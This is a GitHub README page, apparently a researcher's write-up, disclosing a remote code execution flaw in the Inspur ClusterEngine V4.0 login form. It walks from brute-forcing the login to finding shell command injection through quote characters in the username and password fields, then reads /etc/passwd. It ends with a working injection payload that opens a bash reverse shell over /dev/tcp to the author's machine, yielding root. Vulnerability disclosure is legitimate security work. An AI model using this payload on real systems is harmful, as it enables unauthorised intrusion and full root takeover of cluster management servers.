Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Inspur/ClusterEngineV4.0 Vul/
Inspur/ClusterEngineV4.0 Vul/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

Inspur ClusterEngineV4.0 Remote Code Execution

0x01 Description

Today, i found a Inspur Server Cluster Management System in our intranet, which login page looks like that.

1573267238057

It doesn't have verification code, so i decide to crack a login account.

1573267410033

when burpsuite crack finished, i noticed if post data has ;', the response packet is abnormal.

1573267472820

At now, I realize that there may be a remote code execution, and I put this packet in repeater to repeat it, I found if there is a ' in post data, the system will throw an exception.

1573267667895

1573267621779

When I further tested, I found that either the username parameter or the password parameter contains ', an exception will be thrown.

1573267874260

So I decided to try send ' ' to see the response packet.

1573267904173

I noticed grep command error, may be server code like

var1 = `grep xxxx`
var2 = $(python -c "from crypt import crypt;print crypt('$passwd','$1$$var1')")

So i try to send -V and --help to see response packet, the response packet confirmed my guess.

1573268170355

1573268245311

Try to read /etc/passwd

1573268332873

Try to list the directories

1573268361127

0x02 Pwned

Now, I confirmed there is a remote code execution that i found, after fuzz, I got the following payload

whoami

1573268530852

uname

1573268555327

reverseshell

op=login&username=1 2\',\'1\'\);  `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`

When i send payload, i get a root shell on my kali linuxserver

1573268596272

1573267093372